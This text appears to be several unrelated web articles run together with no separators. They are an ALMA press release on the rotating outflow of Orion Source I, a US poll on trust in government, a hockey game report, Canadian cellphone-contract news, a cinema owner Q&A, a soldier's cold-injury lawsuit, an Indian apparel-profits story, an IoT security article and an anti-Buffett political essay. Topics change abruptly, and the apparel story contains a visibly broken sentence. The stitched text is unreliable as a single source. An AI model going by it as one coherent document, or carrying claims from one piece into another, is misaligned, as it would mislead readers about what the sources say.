An international research team used the Atacama Large Millimeter/submillimeter Array (ALMA) to determine how the enigmatic gas flow from a massive baby star is launched. The astronomers observed the baby star and obtained clear evidence of rotation in the outflow. The motion and the shape of the outflow indicate that the interplay of centrifugal and magnetic forces in a disk surrounding the star plays a crucial role in the star's birth cry.
Stars form from gas and dust floating in interstellar space. But, astronomers do not yet fully understand how it is possible to form the massive stars seen in space. One key issue is gas rotation. The parent cloud rotates slowly in the initial stage and the rotation becomes faster as the cloud shrinks due to self-gravity. Stars formed in such a process should have very rapid rotation, but this is not the case. The stars observed in the Universe rotate more slowly.
How is the rotational momentum dissipated? One possible scenario involves that the gas emanating from baby stars. If the gas outflow rotates, it can carry rotational momentum away from the system. Astronomers have tried to detect the rotation of the outflow to test this scenario and understand its launching mechanism. In a few cases signatures of rotation have been found, but it has been difficult to resolve clearly, especially around massive baby stars.
The team of astronomers led by Tomoya Hirota, an assistant professor at the National Astronomical Observatory of Japan (NAOJ) and SOKENDAI (the Graduate University for Advanced Studies) observed a massive baby star called Orion KL Source I in the famous Orion Nebula, located 1,400 light-years away from the Earth. The Orion Nebula is the closest massive-star forming region to Earth. Thanks to its close vicinity and ALMA's advanced capabilities, the team could reveal the nature of the outflow from Source I.
“We have clearly imaged the rotation of the outflow,” said Hirota, the lead author of the research paper published in the journal Nature Astronomy. “In addition, the result gives us important insight into the launching mechanism of the outflow.”
The new ALMA observations beautifully illustrate the rotation of the outflow, in the same direction as the gas disk surrounding the star. This strongly supports the idea that the outflow plays an important role in dissipating the rotational energy.
Furthermore, ALMA clearly shows that the outflow is launched not from the vicinity of the baby star itself, but rather from the outer edge of the disk. This morphology agrees well with the “magnetocentrifugal disk wind model.” In this model, gas in the rotating disk moves outward due to the centrifugal force and then moves upward along the magnetic field lines to form outflows. Although previous observations with ALMA have found supporting evidence around a low-mass protostar, there was little compelling evidence around massive protostars because most of the massive-star forming regions are rather distant and difficult to investigate in detail.
“In addition to high sensitivity and fidelity, high resolution submillimeter-wave observation is essential to our study, which ALMA made possible for the first time. Submillimeter waves are a unique diagnostic tool for the dense innermost region of the outflow, and at that exact place we detected the rotation,” explained Hirota. “ALMA's resolution will become even higher in the future. We would like to observe other objects to improve our understanding of the launching mechanism of outflows and the formation scenario of massive stars with the assistance of theoretical research.”
Additional information
ALMA also imaged rotation of a gas jet from a low-mass protostar. Please read the press release “Baby Star Spits a ‘Spinning Jet' As It Munches -Down on a ‘Space Hamburger'” from the Academia Sinica Institute of Astronomy and Astrophysics, Taiwan.
These observation results were published as Hirota et al. “Disk-Driven Rotating Bipolar Outflow in Orion Source I” in Nature Astronomy on June 12, 2017.
The research team members are:
Tomoya Hirota (National Astronomical Observatory of Japan / SOKENDAI), Masahiro Machida (Kyushu University), Yuko Matsushita (Kyushu University), Kazuhito Motogi (Yamaguchi University / NAOJ), Naoko Matsumoto (Yamaguchi University / NAOJ), Mi Kyoung Kim (Korean Astronomy and Space Science Institute), Ross A. Burns (Joint Institute for VLBI ERIC), Mareki Honma (NAOJ/SOKENDAI)
This research was supported by Grants-in-Aid from the Japan Society for the Promotion of Science and the Ministry of Education, Culture, Sports, Science and Technology, Japan (No. 21224002、 24684011、25108005、15H03646、15K17613、24540242、25120007).
The Atacama Large Millimeter/submillimeter Array (ALMA), an international astronomy facility, is a partnership of the European Organisation for Astronomical Research in the Southern Hemisphere (ESO), the U.S. National Science Foundation (NSF) and the National Institutes of Natural Sciences (NINS) of Japan in cooperation with the Republic of Chile. ALMA is funded by ESO on behalf of its Member States, by NSF in cooperation with the National Research Council of Canada (NRC) and the National Science Council of Taiwan (NSC) and by NINS in cooperation with the Academia Sinica (AS) in Taiwan and the Korea Astronomy and Space Science Institute (KASI).
ALMA construction and operations are led by ESO on behalf of its Member States; by the National Radio Astronomy Observatory (NRAO), managed by Associated Universities, Inc. (AUI), on behalf of North America; and by the National Astronomical Observatory of Japan (NAOJ) on behalf of East Asia. The Joint ALMA Observatory (JAO) provides the unified leadership and management of the construction, commissioning and operation of ALMA.
Sixty-two percent of respondents say their confidence in Washington has decreased over the past 12 months. Poll finds low trust in feds
A majority of voters say their confidence in the federal government's ability is falling, according to a new Public Strategies Inc./Politico poll.
Sixty-two percent of respondents say their confidence in Washington has decreased over the past 12 months, while only 8 percent said their confidence has increased. Less than a third of those polled said their confidence in the federal government remained the same.
Story Continued Below
The poll, conducted Dec. 17-21, surveyed 1,000 registered voters nationwide.
That lack of confidence is demonstrated by the percentage of voters who think the country is on the right path: 65 percent said the country is on the wrong track, while 35 percent believe the country is heading in the right direction.
That pessimism extends to perceptions of the future, as half of all respondents described the likelihood that the next generation of Americans will enjoy a better life than we do today as either “not very much” or “none at all.”
The major source of dissatisfaction is the state of the economy and the government's response to the financial crisis.
Only 5 percent said they have a “great deal” of trust that the federal government will manage its finances responsibly, while 23 percent expressed “some” trust that the government will be financially responsible. Meanwhile, an overwhelming 63 percent of respondents described their amount of trust as “not very much” or “none at all.”
See Also Public Trust Monitor survey results
Despite the glaring lack of confidence, voters want action to aid the economy.
When asked which issue should be the biggest priority, 45 percent listed an economic stimulus package with a focus on employing out-of-work Americans. None of the other options — which included health care reform, a national energy policy, financial services industry reform and withdrawal from Iraq — were rated as the top priority by more than 16 percent of voters.
Voters also indicated a desire for prompt action and expressed little concern that the incoming Obama administration may go “too far” in executing some of its many desired goals to revitalize the economy.
Just 13 percent worried that the government will go too far in cutting taxes on the middle class, and only 24 percent worried it will go too far in increasing taxes on corporations.
A majority of voters, meanwhile, expressed fear that the government will not go far enough to increase taxes on corporations or on households making more than $200,000.
Forty-two percent feared the government will not go far enough to increase taxes on corporations, and 37 percent said the government will not go far enough to increase taxes on those earning more than $200,000. Twenty-eight percent feared it would go too far in taxing those households.
Tomas Hertl's first goal of the evening sent Rangers goalie Henrik Lundqvist packing. After his second, he stole a happy glance up at his mom and girlfriend. The Sharks were dismantling the Rangers and it was starting to get late when the young Czech rookie scored again. Still, no one at the SAP Center (née HP Pavilion) minded even when it took arena crews a few extra minutes to corral all the hats and remove them from the ice. It was only the 19-year-old's third NHL game, after all, and who could resist that wide smile?
Those who stuck around were generously rewarded a few minutes later with Hertl's fourth goal. (Those who stuck around and weren't the New York Rangers, I should say.)
If Allen Iverson played hockey, he would have scored this goal. Steel yourselves, children's hockey coaches everywhere, to lose thousands of kid-hours going forward in the pursuit of this goal. The only thing more fun than seeing it was sitting next to Larry Brooks in the press box while he watched this goal.
“That's something I don't have in my bag,” Sharks captain Joe Thornton said.
The atmosphere had that universal slaphappy vibe that develops whenever any group of people is collectively and unexpectedly given something for free. Sometimes it's bagels in the break room, other times it's a Chevy Volt at a taping of Oprah, and in this case, it was that “Wait, this kid's on our team?” realization in the middle of trouncing New York.
Hertl's four points Tuesday night brought his scoring total to seven on the season, placing him technically atop the league. (Yeah, yeah, we're talking two, three games here, but just indulge it; what else are the first few weeks of an 82-game season for?!)
As if that weren't enough, there was his charming, fractured-English postgame interview. “This is dream,” he said, “No reality. I'm happy and crazy and I don't know and big game and this is dream.”
There was the “Teenage Mutant Ninja Hertl” insta-nickname, which the good folks at NHL.com were all too happy to take and run with. There was SportsCenter declaring the goal its top play of the night. And there was the adorable confusion surrounding his beside-herself mother: Why was she wearing Patrick Marleau's jersey, anyway? (It was actually the no. 12 jersey Hertl was given for being drafted in 2012, though the Marleau detail would have been so very San Jose.)
“Crazy,” he repeated later in the locker room, in between posing for photos with his four pucks and being personally congratulated by Sharks GM Doug Wilson. “This is a dream.”
But a perfectly timed interview done in Hertl's native language helped shine a light on the player San Jose drafted 17th overall in 2012. With the help of a Czech journalist interpreter, the San Jose Mercury News's David Pollak spoke with Hertl about how he always needs a lift to practice, and about what he has in common with his homeland hero Jaromir Jagr.
“Both of us have big bottoms and I just try to use my big bottom as Jagr does,” Hertl told Pollak.
Some old-school eyebrows may have been raised by Hertl's dangles, but on Tuesday night, Sharks coach Todd McLellan said there was no disrespect intended.
“He's a passionate young man and I'm not even sure if he realizes where he is,” McLellan said. “He's innocent out there our game needs a little bit of that.”
Should he have gone for such a flashy move, McLellan was asked.
“Well, he scored,” he said. “Why not?”
If your cellphone provider has been calling you unexpectedly with offers of a better deal or a free phone upgrade, it's not a fluke. Canada's big three carriers – Bell, Rogers and Telus – are preparing for an unprecedented wave of customer free-agency as a new regulation kicks in on June 3.
And that wave could mean some good deals for people who are willing to bargain with their carrier.
While three-year deals are still technically allowed by the CRTC, the rule will effectively kill such contracts because they forbid carriers from charging early cancellation fees after 24 months.
Carriers had challenged the CRTC's right to apply the 24-month contract cancellation rule retroactively to existing agreements. The Federal Court of Appeal last week ruled that the CRTC was within its jurisdiction. (Graham Hughes/The Canadian Press) As a result, anyone who signed a three-year contract before June 3, 2013, will be able to walk away from it next week without having to pay any penalty.
Customers who signed three-year contracts between June 3 and Dec. 2, 2013, may still be subject to a cancellation fee, but it will be calculated according to the Canadian Radio-television and Telecommunications Commission's Wireless Code formula and not the terms of their contract.
"It (the cancellation fee) will likely be significantly smaller than it would otherwise have been," CRTC spokesperson Patricia Valladao said.
Double-cohort
Along with the normal wave of two-year contracts ending in June, the CRTC rule means wireless providers are now facing a so-called "double cohort" – an additional group of customers who would otherwise have a third year left on their agreement. And that's making the carriers nervous.
"We have planned for this (double-cohort) and have been actively working with customers, offering various promotions and packages," said Rogers spokesperson Michelle Kelly. (Ryan Remiorz/Canadian Press)
A Scotia Capital report in January estimated the number of Canadians still on three-year contracts at the end of 2014 to be between 2.2 million and 4 million.
Phone companies have been contacting customers and offering deals in exchange for signing new two-year wireless agreements as a result.
"We have planned for this and have been actively working with customers, offering various promotions and packages," said Rogers spokesperson Michelle Kelly.
All three carriers have also been advertising service discounts through their respective "flanker" brands – Virgin, Fido and Koodo – to customers who own or have paid off their phones. The "limited time" deals are typically offering popular 1 gigabyte, 2 GB and 3 GB plans for $10 off the regular price.
Market watchers expect the deals to continue for the next few months, and say that now is a good time for consumers to shop around for bargains, and possibly switch to alternative regional providers such as Wind, Videotron or Eastlink that offer discounts.
"People can also go month to month and try Wind if it's popping up in your area, or maybe some of the other companies if they're lucky enough to be in an area where they [offer service]," said John Lawford, executive director of the Public Interest Advocacy Centre.
"It's usually better to be proactive about it than to wait for them to come to you," he adds
The double cohort means consumers have more bargaining power than usual, a fact that many still don't appreciate or act on.
"It's a clear competitive opportunity for all carriers and Bell's ready for it with the major investments we've made in networks, mobile services and distribution," said Bell spokeswoman Jacqueline Michelis. ((Ryan Remiorz/Canadian Press)) "People still haven't got used to the fact that they have the power now, so they're not exercising their right to walk," Lawford added. "People don't know it's easier now. They still think if they switch, something bad will happen."
The CRTC's Wireless Code, which introduced several pro-consumer measures such as caps on roaming fees and handset-unlocking requirements, took effect in 2013.
The CRTC says consumers should familiarize themselves with the Code, which is available online in a simplified form.
The Code lays out the formula for contract cancellation fees and outlines how carriers must unlock phones if a customer leaves so that they can work on other providers' networks. A customer who is looking to switch providers, for example, may need to get their phone unlocked by their existing carrier before doing so, which could be subject to a fee.
"The fact that the Wireless Code now applies to [customers'] contracts… reduces barriers to switching," Valladao said.
"If a consumer thinks that their service provider is not following the Wireless Code, they can seek help from the Commissioner for Complaints for Telecommunications Services."
Opportunity for the carriers
The carriers had challenged the regulator's right to apply the 24-month contract cancellation rule retroactively to existing agreements. The Federal Court of Appeal last week ruled that the CRTC was within its jurisdiction in doing so, clearing the way for the double cohort of expiring phone contracts on June 3.
Telus says it is well positioned to poach customers from rival carriers because of improvements in customer service. The company has fared well in recent reports from the CCTS and J.D. Power. (Chris Wattie/Reuters) Bell, Rogers and Telus have said they do not plan to take the challenge to the Supreme Court and are instead looking to keep or lure customers with better deals.
"It's a clear competitive opportunity for all carriers and Bell's ready for it with the major investments we've made in networks, mobile services and distribution," said Bell spokeswoman Jacqueline Michelis.
"With just half our mobile customers now on 4G LTE, it's also a chance to upgrade many of them to the latest network technology as contracts expire."
Telus says it is well positioned to poach customers from rival carriers because of improvements in customer service. The company has fared well in recent reports from the CCTS and J.D. Power.
"Telus tends to do well when a lot of Canadians are looking for a new carrier, like the back-to-school period and Christmas. We expect we will do well at this time as well," said spokesperson Luiza Staniec.
While cellphone customers have extra bargaining power now, it may not last. Financial analysts expect the wave of deals could hurt the companies' profitability in the coming months, which is making consumer advocates wary that carriers could resume price hikes once the threat of the double cohort subsides.
"They'll raise rates when they can. They'll raise rates if people don't switch," Lawford said.
David McRae
Ark Lodge Cinemas
4816 Rainier Avenue South
Seattle, WA 98118
Movieline: (206) 721-3156
Facebook
Twitter
How long in business?
5 years
Year opened?
2012
What does your business do?
Seattle's best independent movie theater, right here in the heart of Columbia City!
What are your main products/services?
First-run movies and amazing popcorn!
Who is your ideal customer?
All of our neighbors here in South Seattle! But, seriously, we usually have at least one family-friendly movie each week, and we've recently added screenings after 9pm to satisfy our Millennial customers (and night owls).
What problem do you solve for your customers? What necessity or desire do you satisfy?
The need to hear a good story, well told (in most cases).
What inspired you to start your business?
Having the opportunity to run a movie theater is a job model most people would run away from, but I have always enjoyed showing movies in the best light possible. Seattle is also a tough economy to do business in, so it is as a labor of love, because I certainly did not invest in a movie theater to get rich!
What makes your business different or unique compared to your competitors?
Family-run, hand-picked films, focus on the neighborhood.
What do you like most about what you do?
Seeing the smiles on peoples' faces when they've just seen an inspiring film at The Ark Lodge.
Do you have any special news, deals or events to promote in the year ahead?
Our Groupon is always a popular, and we now have gift certificates that you can purchase online.
Do you have any future plans for growth or expansion that you can share with us?
Renovations and upgrades are definitely at the top of our list!
GO: South Seattle connects neighbors with the people and places that make this Seattle's most vibrant community. For advertising inquiries, please contact us at 206.234.9866 or sales@gosouthseattle.com.
A black former soldier is suing the Ministry of Defence for injuries sustained during winter training when he claims his hands were exposed to freezing temperatures.
Abdoulie Bojang, 30, was training in Banff, Canada, and is seeking £200,000 after he says his hands were exposed to temperatures of -30C.
He claims the army 'failed to take into account his ethnicity' during the training exercises, according to the Sunday Times.
A spokesman for solicitors Bolt Burdon Kemp said: 'Service personnel of African and Afro-Caribbean descent, including those of mixed race, are particularly vulnerable in low temperatures.'
According to one lawyer at Irwin Mitchell at least 450 Commonwealth soldiers have suffered cold injuries in the past decade.
Abdoulie Bojang, 30, was training in Banff, Canada, is seeking £200,000 after he says his hands were exposed to temperatures of -30C. He is suing the MoD over claims of non freezing cold injuries (File photo)
The ex-soldier, originally from the Gambia who now lives in Warwickshire, was medically discharged from the army in September last year.
Bojang, who served with the Royal Logistic Corps, has lodged a claim in the High Court via his barrister Christopher Barnes.
In the soldier's claim about the 2014 exercise in the Rocky Mountains, it says: 'During the afternoon he noticed that his feet were numb as were both of his hands.
'He made his way to the resort lodge to warm his hands and saw that they had changed colour.'
A spokesperson for Bolt Burdon Kemp added: 'The MoD has acknowledged research indicating that these groups are 30 times more likely to contract an NFCI (non-freezing cold injury) than Caucasian service personnel.
The ex-soldier, originally from the Gambia who now lives in Warwickshire, was medically discharged from the army last September. He claims the army 'failed to take into account his ethnicity' during the training exercises (File photo)
'Even mild injuries can leave long-term effects such as problems regulating body temperature.
HOW TO PREVENT NON-FREEZING COLD INJURIES Limit exposure
Keep feet and hands as dry as possible
Regular hot food and drink
Early recognition of symptoms, evacuation and treatment
Report incidents properly to help identify clusters of cases
Most importantly, be aware of the early signs of cold injury
'The damage to a military career and the prolonged pain can even result in depression.
'Many of our clients have problems with day-to-day living because their hands have been affected so that their manual dexterity is reduced.
'Personnel from the Commonwealth will often find that, following a cold injury, they are restricted to working in warm climates.
'This means they can no longer follow any plans they may have made to make a life in the UK, Europe or North America.'
A non-freezing cold injury comes about when the core temperature of the body remains below its natural level for a long period of time.
When someone's core temperature falls too low the blood vessels constrict, thereby reducing blood flow to hands and feet.
This has the effect of reducing the amount of oxygen transported to those extremities.
This is harmful even though body tissue does not freeze.
Bojang, who served with the Royal Logistic Corps, has lodged a claim in the High Court via his barrister Christopher Barnes (File photo)
If there is no immediate treatment nerve and blood vessel damage can occur, sometimes causing permanent injury.
A spokesperson for the Ministry of Defence said: 'When compensation claims are submitted, they are considered on the basis of whether or not the Ministry of Defence has a legal liability to pay compensation.
'Where there is a legal liability to pay compensation, we do so.'
Last year a parliamentary select committee chaired by MP Madeleine Moon heard that hundreds of military personnel are injured every year because the MoD fails to follow its own safety rules.
Lawyers representing injured service men and women told the Defence Select Committee that the armed forces fail to learn from past mistakes resulting results in the death and injury of soldiers every year.
MUMBAI: Ethnic retail chains Fabindia and Manyavar have emerged as the country's most profitable apparel companies by avoiding discounts, staying away from prime real estate and making products in-house in a market where most international brands are looking to grab share by offering price cuts. Fabindia Overseas posted a net profit of Rs 54 crore in the year ended March 31, 2014, according to filings at the Registrar of Companies.Kolkata-based Vedant Fashions , which owns ethnic wear brand Manyavar, made a Rs 49-crore profit. Levi's India was the only marquee international brand that could match them, posting a Rs 49-crore net profit. This is the first time Levi's India has made a profit since entering the country in 1994. None of the other overseas brands, including Zara, Benetton and Marks & Spencer, were able to come close to the performance of the Indian companies."We didn't get into the trap of discounting even as others did to chase top line. To build a sustainable business, we need profits and cash flow," said Sunil Chainani, executive director at Fabindia, also the largest apparel brand in the country with Rs 604 crore in sales."There are instances where we didn't open stores in prime localities or high-footfall zones at malls that guaranteed higher sales as rentals would have impacted margins." Right from local boutiques to established traditional retailers and regional brands, every ethnic wear retailer is vying for a share of the consumer wallet in a market that is governed more by design than brand name.consumers, a new development in a category restricted to older buyers. Fabindia opened 17 new retail outlets in FY14, taking the number of stores to 175. Manyavar has been more aggressive, adding nearly two stores every week on average, taking the count to 360 now, clocking annual sales of Rs 373 crore."There was a lot of disconnects between customers and manufacturers in the occasion-wear segment. We are just trying to fill that void," said Manyavar's founder Ravi Modi. The first outlet opened in 1999 in Kolkata but Manyavar didn't expand at all in the following decade. "Our second store came up only in 2008 as real estate costs became realistic due to the economic slowdown. And, we don't sell a single garment on discount."In comparison, most apparel brands have been offering steep discounts to move unsold merchandise, resulting in the erosion of retail margins and more than a fifth of sales taking place during end-of-season sales. This is just one reason for the strong bottom line, said both homegrown companies. They also make nearly 95% of their merchandise inhouse, helping to keep inventory tight and costs under control.In fact, Fabindia runs every store as a profit centre in an effort to democratise operations while Manyavar either donates or destroys unsold stock, adding pressure on the company to keep designs relevant and sell products aggressively. However, experts feel both companies will need to reinvent their portfolio to sustain the top position in their segments."While Fabindia is positioned as organic and niche, it still has to compete with western brands for the share of wardrobe and wallet. And Manyavar has to move away from its occasion and wedding-wear tag and tweak its offering with more Indo-Western clothing that can be worn on more occasions," said Ruchi Sally, director at retail consultancy Elargir Solutions. The companies say they are already at work on these lines.Fabindia has launched its western wear line Fabels while Manyavar has been adding Indo-western merchandise in its collection. Ethnic wear, still mostly fed by the unorganised segment, has demonstrated steady growth over the past few years and is set to expand by 8.4% over the next decade from Rs 61,679 crore now, according to retail consultant Technopak. Leading department chain formats such as Shoppers Stop, Lifestyle and Westside are increasing the width of their private label range and offer contemporary styling in the ethnic space, fuelling growth.
Conversations around the impending Internet of Things (IoT) revolution tend to go one of two ways. The more technologically receptive see the possibilities as exciting, and await the future of self-stocking fridges and smart-jackets with glee. The smart home, the smart city - the future is connected and the effect this will have on our lives is tremendous. Others, though, look at the IoT and see a plethora of security and privacy issues, almost all of which are well-founded.
Mobile phones faced - and continue to face - similar reservations when they became connected, and the wearable technology adorning people's wrists is simply further behind on the acceptance arc. The problems facing wearables in particular, though, are so wide-ranging as to be daunting for those looking to safeguard their customers from hacking and potential fraud. Each functionality of a smartwatch, for example, has the potential to be exploited and it is the job of the developer to, in a sense, predict crimes before they happen. Spotting the gaps in the tech's security is difficult, though, and it is early adopters that run the risk of falling victim to a new type of crime.
TechCrunch uses the example of a smartwatch being hacked, its motion sensing data being extracted and this data then being used to determine the user's PIN number. A team from the Stevens Institute of Technology ‘combined wearable sensor data harvested from more than 5,000 key entry traces made by 20 adults with an algorithm they created to infer key entry sequences based on analyzing hand movements.' The process is complex but the results are astounding, with the team able to establish a user's PIN with 80% first-time accuracy, and more than 90% accuracy after three attempts. This technique could extend to typing done on a keyboard, the implications of which are great. Simple solutions like the user using their other hand to type their PIN would work, but the forgetful and the uninformed would still be targets.
A PricewaterhouseCoopers report found that 70% of connected IoT devices in use today lack fundamental security safeguards. Fresh concerns seem to surface weekly, from the hacking of driverless cars to many fitness bands possessing hopeless in-built security. The reason for this is that, by its very nature, the IoT has multiple points of vulnerability - the product, its communication channels, stored data inside the device, its data aggregation platform, embedded software and the data centers used to analyse the sensor data. Each key IoT developer will have security at the heart of their strategy for this reason, but plugging the gaps, one feels, will be something of a thankless task.
The smart home, with all its potential functionalities, is rife with opportunities for invasion of privacy or compromising data extraction. A connected door, for example, could be hacked and could monitor when a person enters or leaves their home or, worse still, be opened remotely. Child monitors and smart TVs could watch their user. A smart car could tell a hacker both how many members of a family have left their home and the exact distance away from the property they are. Articles around the topic tend to read with an air of the luddite, and simply listing the potential security concerns may seem reductive. In reality, though, there are simply so many potential exploitations that users are right to be concerned, and manufacturers have a responsibility to be.
Striking the balance between security and efficiency is a job for these manufacturers, but consumers should be aware of the risks and buy products with security in mind. Senior director of marketing at Arcsoft, Caroline Tien-Spalding, said: ‘Before you buy a connected device, do your research. How is your data protected and encrypted? Where is it stored? Does it include an option for a public stream?' There are a number of methods consumers can use to safeguard themselves from attacks, and before turning your home into a vision of the future, it is well worth taking preventative measures to avoid any sensitive information being hacked. The IoT is an exciting development in both personal and public technology - as with any new technology, though, the dangers should be just as large a part of the conversation as the potential.
Don't Tax the Rich, Smash Their Privilege: A Response to Warren Buffett
Recently the progressive blogosphere was abuzz with approving links to billionaire investor Warren Buffett's latest New York Times op-ed, “Stop Coddling the Super Rich.” In this piece, Buffett concisely exposes the various loopholes that allow the wealthiest Americans to pay far fewer taxes than their middle class, working class, and poor counterparts. While the tax code in all its complexity certainly privileges the wealthy at the expense of most Americans, this barely scratches the surface of the ways the state oppresses poor and working people to line the pockets of the opulent. Buffett's article never mentions direct corporate welfare or the numerous privileges that the wealthy hold thanks to intellectual property, the land monopoly, regulatory barriers to entry, suppression of labor movements, and imperialism, to name a few. To illustrate the extent to which government intervention privileges the super rich at the expense of everyone else, I will examine Warren Buffett's stock portfolio and expose how his wealth stems from violence, coercion, imperialism, and statism.
Coca-Cola, Human Rights, and Labor Suppression
According to http://warren-buffett-portfolio.com/, the #1 corporation in Warren Buffet's stock portfolio is Coca-Cola. Coca-Cola has an abysmal human rights record, most noteworthy thanks to its colorful history of repressing labor organizing. According to an article by Jeremy Rayner for the John F. Henning Center for International Labor Relations:
There is mounting evidence that American companies are complicit in the persecution of trade unionists at their Colombian operations. In the case of the Coca-Cola bottling plant in Carepa, where Isídro Segundo Gil was murdered, the union Sinaltrainal argues that Coca-Cola knowingly stood by and allowed the plant's manager to bring in paramilitaries to destroy the union. The workers at the Carepa plant had been asking both Coca-Cola and its bottler, Bebidas y Alimentos, to intervene on their behalf for two months before Isídro Segundo Gil's murder. The plant manager, Ariosto Milan Mosquera had announced publicly that he had asked the paramilitaries to destroy the union. His declaration had been followed by a series of death threats from the paramilitaries, which had prompted the union to send letters to both Coca-Cola and Bebidas y Alimentos asking that they intervene to secure their workers' safety. And this was not the first time that threats against workers had been carried out. Just two years before, in 1994, the paramilitaries had killed two trade unionists at the same plant. It should have surprised no one when two and a half months after the union's plea for help, Isídro Segundo Gil was murdered and the union busted.
Unionists have also been assassinated at other Coca-Cola bottling plants in Colombia, both before and after the incident at Carepa. One unionist, José Avelino Chicano, was killed at a Coca-Cola plant in Pasto in 1989. In 2002, despite the limited publicity surrounding the events at Carepa, a union leader named Oscar Dario Soto Polo was killed during the course of contract negotiations at the plant in Bucaramanga. Despite the remarkable courage and perseverance of Colombia's labor activists, the campaign of intimidation has necessarily taken its toll on worker organizing. The president of Sinaltrainal, Javier Correa, reported last year that the number of unionized workers at Coca-Cola plants had dropped by more than two thirds since 1993-from 1,300 workers to only 450.
Such campaigns of violent intimidation have been aided and abetted by US tax dollars. Many of those involved with these anti-union campaigns of violence were graduates of the Defense Department's infamous School of the Americas. The right wing paramilitaries which regularly slaughter labor organizers are closely connected to the Colombian military, which receives huge amounts of aid from the US government so as to fight the drug war as well as a dirty war against the anti-capitalist Revolutionary Armed Forces of Colombia (FARC). Thus, even if Warren Buffett were to pay more in taxes, at least some of that money would go to violence against labor organizers.
In addition to brutality in Colombia, Coca-Cola has been implicated in violence and intimidation against unionists in Guatemala. These and other Coca-Cola human rights violations are profiled in detail at http://killercoke.org/.
Note that, contrary to Buffett's progressive image, he profits immensely off of Coca-Cola's human rights violations. If Buffett really wants to “get serious about shared sacrifice,” he should sacrifice the profits he has gained through the corrupt tactics of Coca-Cola and use some of his immense wealth to help the Coca-Cola workers suffering throughout the globe thanks to those tactics. He should also repudiate the US government's military aid and imperialist intervention in countries like Colombia.
Wells Fargo and the Prison Industrial Complex
The number two corporation in Warren Buffet's stock portfolio is Wells Fargo. Wells Fargo is a major beneficiary of corporate welfare. For instance, they received $43.7 billion in federal taxpayer bailout money. But far more destructive is Wells Fargo's investment in prison profiteers. Wells Fargo owns 4 million shares in the Geo Group, the second largest private prison corporation in America, and 50,000 shares in the Corrections Corporation of America (CCA), the largest private prison corporation in the country. These shares combined are valued at more than $120 million (Source: http://www.cjjc.org/en/news/50-immigrant-rights/215-wells-fargo-divest-from-prisons).
Companies such as the Geo Group and CCA do not earn their money by providing goods or services to customers. Rather, they make their money solely from the government, and solely for locking human beings in cages, mostly for non-violent offenses. Further, these companies actively lobby for unjust laws, largely using the American Legislative Exchange Council (ALEC), a corporatist conservative political group. As Bob Sloan and Mike Elk wrote in a recent article for The Nation:
ALEC helped pioneer some of the toughest sentencing laws on the books today, like mandatory minimums for non-violent drug offenders, “three strikes” laws, and “truth in sentencing” laws. In 1995 alone, ALEC's Truth in Sentencing Act was signed into law in twenty-five states. (Then State Rep. Scott Walker was an ALEC member when he sponsored Wisconsin's truth-in-sentencing laws and, according to PR Watch, used its statistics to make the case for the law.) More recently, ALEC has proposed innovative “solutions” to the overcrowding it helped create, such as privatizing the parole process through “the proven success of the private bail bond industry,” as it recommended in 2007. (The American Bail Coalition is an executive member of ALEC's Public Safety and Elections Task Force.) ALEC has also worked to pass state laws to create private for-profit prisons, a boon to two of its major corporate sponsors: Corrections Corporation of America and Geo Group (formerly Wackenhut Corrections), the largest private prison firms in the country. An In These Timesinvestigation last summer revealed that ALEC arranged secret meetings between Arizona's state legislators and CCA to draft what became SB 1070, Arizona's notorious immigration law, to keep CCA prisons flush with immigrant detainees. ALEC has proven expertly capable of devising endless ways to help private corporations benefit from the country's massive prison population.
These laws increase the number of peaceful people locked in cages, as well as the lengths of their sentences. Those they lock up are almost without exception members of the working class, and they are disproportionately people of color. Meanwhile, Geo Group and CCA gather obscene profits from these racist and classist laws. Wells Fargo then profits by investing in these firms, and Warren Buffett profits by investing heavily in Wells Fargo. If Warren Buffett were to pay more in taxes, at least some of those taxes would go to the prison industrial complex and then head straight back to Warren Buffett's unfathomably large bank account.
Warren Buffett the War Profiteer
Never does the government “coddle the super rich” more than in times of war. In war, poor and working people are sent to fight and die in a foreign land. They are sent to kill the populations of poor countries, and those killed disproportionately represent the country's working class. Meanwhile, corporate executives and investors profit heavily by selling the weapons, vehicles, and other devices used to murder poor people in a distant land. It should not surprise you to learn that Warren Buffett is among the investors profiting off of the American military industrial complex.
According to http://warren-buffett-portfolio.com/, Buffett owns 7.8 million shares of General Electric stock. GE produces a wide variety of products, and their war profiteering portfolio is no less diverse. General Electric has sold the US military aircraft, missiles, bombs, and battlefield computer systems, to name a few. Further, GE has been charged multiple times with defrauding the US government in relation to their defense contracts.
Warren Buffett also owns 34.2 million shares in ConocoPhilips and 0.4 million shares in Exxon Mobil, both of which are oil companies which have profited from the invasion of Iraq. Earlier this year Buffett seriously considered investing in General Dynamics, a company which earns all of its revenue through military contracts.
An increase in Warren Buffett's tax burden would not change this dynamic in the slightest. Indeed, the bulk of tax dollars go to so-called “defense spending,” which amounts to nothing more than blood stained subsidies to these and other military industrial complex corporations.
Monsanto and the Patent Monopoly
CNN Money reported in 2010 that Warren Buffett owned stock in Monsanto. Monsanto is a controversial agribusiness and biotechnology firm, best known for developing genetically modified organism (GMO) crops. For this reason, they have been strongly opposed by many environmental groups. The impact of GMO crops is a topic for scientific debate which I will not discuss here. However, it is incredibly noteworthy that Monsanto has enlisted patent law to crush small producers, in a dramatic illustration of the “patent monopoly” long written about by individualist anarchists such as Benjamin Tucker.
Monsanto's genetically modified seeds are all patented, granting the company monopoly privileges and the ability to use state violence to harass any farmers who save seeds, or even those whose fields are cross pollinated by Monsanto's GMO crops. Monsanto has filed over 100 patent lawsuits against farmers. One, Kem Ralph, has had to pay $3 million dollars and serve prison time, simply for saving seeds, a common agricultural practice. Such aggressive tactics from Monsanto have prompted a group of farmers represented by the Public Patent Foundation to fight back:
On behalf of 22 agricultural organisations, 12 seed businesses and 26 farms and farmers, the Public Patent Foundation (PUBPAT) is suing the biotech company in the federal district court in Manhattan and assigned to Judge Naomi Buchwald.
The organic plaintiffs had to pre-emptively protect themselves from potential patent infringement in case of accidental contamination of their crops by genetically modified organisms (GMOs), said PUBPAT.
“This case asks whether Monsanto has the right to sue organic farmers for patent infringement if Monsanto's transgenic seed should land on their property,” said Dan Ravicher, PUBPAT's executive director and a law professor at Benjamin N. Cardozo School of Law in New York. PUBPAT is a non-profit legal services organisation based at Cardozo law school. Its stated mission is “to protect freedom in the patent system.”
“It seems quite perverse that an organic farmer contaminated by transgenic seed could be accused of patent infringement, but Monsanto has made such accusations before and is notorious for having sued hundreds of farmers for patent infringement, so we had to act to protect the interests of our clients,” he said in a press release.
